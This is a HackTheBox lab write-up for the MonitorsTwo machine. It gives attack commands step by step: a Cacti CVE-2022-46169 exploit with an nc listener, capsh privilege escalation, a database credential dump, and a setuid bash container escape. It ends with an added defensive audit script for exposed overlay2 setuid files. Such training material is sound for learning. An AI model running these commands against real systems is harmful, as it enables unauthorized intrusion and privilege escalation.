HackTheBox Writeup — MonitorsTwo

Dicky Aditrianza
May 8, 2023

Hello everyone, this is my first writeup, on the HackTheBox machine called MonitorsTwo.

If there are mistakes in the writing or other errors, I apologize; criticism and suggestions are very welcome. Now let’s begin, shall we?

First, I do a port scan as usual using Nmap.

nmap -p- -sC -sTV --min-rate 5000 10.10.11.211

Only 2 ports are open: SSH and HTTP. Let’s jump to the HTTP page.

I tried several default credentials such as admin:admin, but they didn’t work. So I searched Google for a vulnerability using the information I got from the login page.

Hmm, it seems that the machine is vulnerable to CVE-2022-46169. Now let’s find the exploit.

https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

I found the exploit on GitHub. It was very simple: just clone the repository and run it as the PoC describes.

Listen on port 8888

nc -nvlp 8888

And run the exploit

I got a shell as www-data. Let’s do the enumeration with LinPEAS to gain further access.

Found an interesting binary here; let’s take a look at GTFOBins.

https://gtfobins.github.io/gtfobins/capsh/

Run the command on the target machine.

capsh --gid=0 --uid=0 --

Got a root shell, but I noticed that I still can’t get the flag in the root directory or even the home directory. Now let’s enumerate the database.

mysql --host=db --user=root --password=root cacti -e "select * from user_auth;"

Found 3 users; let’s crack the password using john.

Use the password to log in over SSH as user Marcus.

Got the user flag.

Privilege Escalation

Now for the privilege escalation, run chmod u+s /bin/bash in the previous shell.

Back in the SSH shell, run findmnt.

Then run /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

Got the root flag. Finally, we solved the machine.
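
The last step worked because a setuid file inside a container's overlay2 merged directory could be reached by path from an unprivileged account on the host. A host-side audit for that condition follows as an added example, not part of the original writeup; the function names are hypothetical, and the default data root is taken from the path shown above.

```shell
#!/bin/sh
# Added example, not from the original writeup. Function names are hypothetical.

# True when "other" users can traverse directory $1 (o+x set).
others_can_traverse() {
    [ -n "$(find "$1" -maxdepth 0 -type d -perm -001 2>/dev/null)" ]
}

# True when every directory from data root $1 down to file $2 is o+x,
# i.e. an unprivileged host user can reach the file by its path.
reachable_by_others() {
    dir=$(dirname "$2")
    while :; do
        others_can_traverse "$dir" || return 1
        [ "$dir" = "$1" ] && return 0
        case "$dir" in "$1"/*) dir=$(dirname "$dir") ;; *) return 1 ;; esac
    done
}

# Print setuid regular files inside every overlay2 "merged" view under $1.
list_setuid_in_merged() {
    for merged in "$1"/overlay2/*/merged; do
        [ -d "$merged" ] || continue
        find "$merged" -xdev -type f -perm -4000 2>/dev/null
    done
}

# Print "EXPOSED <path>" for each setuid file a host user can reach.
# Returns 1 if any were found, 0 otherwise.
audit_docker_root() {
    root=${1:-/var/lib/docker}
    hits=$(list_setuid_in_merged "$root" | while IFS= read -r f; do
        if reachable_by_others "$root" "$f"; then echo "EXPOSED $f"; fi
    done)
    if [ -n "$hits" ]; then echo "$hits"; return 1; fi
    return 0
}

# Run the audit only when a data root is passed, e.g.: sh audit.sh /var/lib/docker
if [ $# -gt 0 ]; then audit_docker_root "$1"; fi
```

Run it as root on the Docker host so that find can read every layer; any EXPOSED line means the directory permissions along that path let host users execute a setuid file that lives inside a container.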
